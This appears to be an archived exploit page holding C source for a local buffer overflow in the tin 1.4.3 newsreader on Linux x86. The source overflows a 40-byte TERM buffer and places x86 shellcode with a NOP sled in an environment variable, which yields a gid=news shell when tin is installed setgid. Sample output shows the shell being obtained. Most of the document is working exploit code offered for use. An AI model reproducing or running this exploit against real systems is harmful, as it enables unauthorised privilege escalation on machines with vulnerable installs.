Tin v1.4.3 local linux/x86 buffer overflow exploit which spawns a gid=news shell if /usr/bin/tin is setgid.
a8dfb59501a701151245b97b74716f47642a1e40df90d8842f5f19a4ea396324/* (linux)tin[v1.4.3(stable)-] buffer overflow, by v9[v9@fakehalo.org]. this
will give you a gid=news shell if /usr/bin/tin is setgid(=2755||=6755). the
buffer that is overflowed in this exploit is only 40 characters long and at
the point of overflow it is setuid(real_uid) and setgid(real_gid). so,
knowing it is practially impossible if not totally impossible to set*id() and
exec() in 40 characters of asm, i just filled that buffer with the return
address to point to an environment variable(4096 bytes) getting placed on the
stack.
syntax: "./tin_bof [offset] [alignment] [group id]"
or
"./tin_bof --help" for required argument values.
example:
-------------------------------------------------
# ./tin_bof -2000 1 13
[ tin[v1.4.3(stable)-] newsreader buffer overflow, by: v9[v9@fakehalo.org]. ]
*** [data]: return address: 0xbffff0b0, offset: -2000, alignment: 1, gid: 13.
*** [data]: size(eip): 73, size(buf): 4078[nops:4001].
*** [data]: program is setgid(=2755): /usr/bin/tin.
Reading config file...
tin: Can't get entry for TERM
sh-2.03$ id
uid=1006(v9) gid=13(news) groups=100(users)
sh-2.03$
-------------------------------------------------
note: this exploit requires that /usr/bin/tin be installed setuid(+setgid)
from install (make install_setuid). this exploit was only written to
obtain the gid of news, but by install the option exists to get the uid
of news(9 usually) too.
info: the following segment is from curses.c[line 251]:
-------------------------------------------------
char the_termname[40], *p;
if ((p = getenv ("TERM")) == (char *) 0) {
my_fprintf (stderr, txt_no_term_set, tin_progname);
return (FALSE);
}
if (strcpy (the_termname, p) == NULL) {
my_fprintf (stderr, txt_cannot_get_term, tin_progname);
return (FALSE);
}
-------------------------------------------------
tested: slackware 3.6 and 7.0. (gid=13 obtained from setuid install)
status: informed package maintainer, (to be) fixed in tin>=1.4.4.
*/
#include <sys/stat.h>
#define PATH "/usr/bin/tin" // path to the tin newsreader binary.
#define DEFAULT_OFFSET -2000 // you have about 4000 bytes of guessing room :)
#define DEFAULT_ALIGN 1 // general aligment assumption.
#define DEFAULT_GID 13 // 'cat /etc/group' if you think differently.
static char exec[]=
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0\xb0\x47\xcd\x80\x31\xdb"
"\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
"\x01";
long pointer(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char eip[64],buf[4096]; // eip[] for the_termname and buf[] for the asmcode.
int i,offset,align,gid;
long ret;
struct stat mod;
printf("[ tin[v1.4.3(stable)-] newsreader buffer overflow, by: v9[v9@fakehalo.org]. ]\n");
if(argv[1]&&!strcmp(argv[1],"--help")){
printf("*** [syntax]: %s [offset] [alignment] [group id].\n",argv[0]);
printf("*** [required]: argument alignment value must be: 0-3.\n");
printf("*** [required]: argument group id value must be: 1-255.\n");
exit(0);
}
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
if(argc>2){
if(atoi(argv[2])>3||atoi(argv[2])<0){
printf("*** [error]: ignored argument alignment value: %s. (use 0-3)\n",argv[2]);
align=DEFAULT_ALIGN;
}
else{align=atoi(argv[2]);}
}
else{align=DEFAULT_ALIGN;}
if(argc>3){
if(atoi(argv[3])<1||atoi(argv[3])>255){
printf("*** [error]: ignored argument gid value: %s. (use 1-255) ]\n",argv[3]);
gid=DEFAULT_GID;
}
else{gid=atoi(argv[3]);}
}
else{gid=DEFAULT_GID;}
ret=(pointer()-offset);
for(i=align;i<64;i+=4){*(long *)&eip[i]=ret;}
for(i=0;i<(4096-strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
exec[10]=gid;exec[22]=gid;exec[24]=gid; // fill in the group id(s).
memcpy(buf+i,exec,strlen(exec));
memcpy(buf,"EXEC=",5);putenv(buf); // environment variable holding shellcode.
memcpy(eip,"TERM=",5);putenv(eip); // filled with only the eip pointer.
printf("*** [data]: return address: 0x%lx, offset: %d, alignment: %d, gid: %d.\n",ret,offset,align,gid);
printf("*** [data]: size(eip): %d, size(buf): %d[nops:%d].\n",strlen(eip),strlen(buf),(strlen(buf)-strlen((char *)strrchr(buf,0x90))+1));
if(stat(PATH,&mod)){
printf("*** [error]: could not obtain stats successfully: %s.\n",PATH);
exit(-1);
}
if(mod.st_mode==34285){printf("*** [data]: program is setgid(=2755): %s.\n\n",PATH);}
else if(mod.st_mode==36333){printf("*** [data]: program is set*id(=6755): %s.\n\n",PATH);}
else{
printf("*** [error]: program isn't (normal) setgid(set*id): %s. (2755||6755)\n",PATH);
exit(-1);
}
if(execlp(PATH,"tin",0)){
printf("*** [error]: could not execute successfully: %s.\n",PATH);
exit(-1);
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed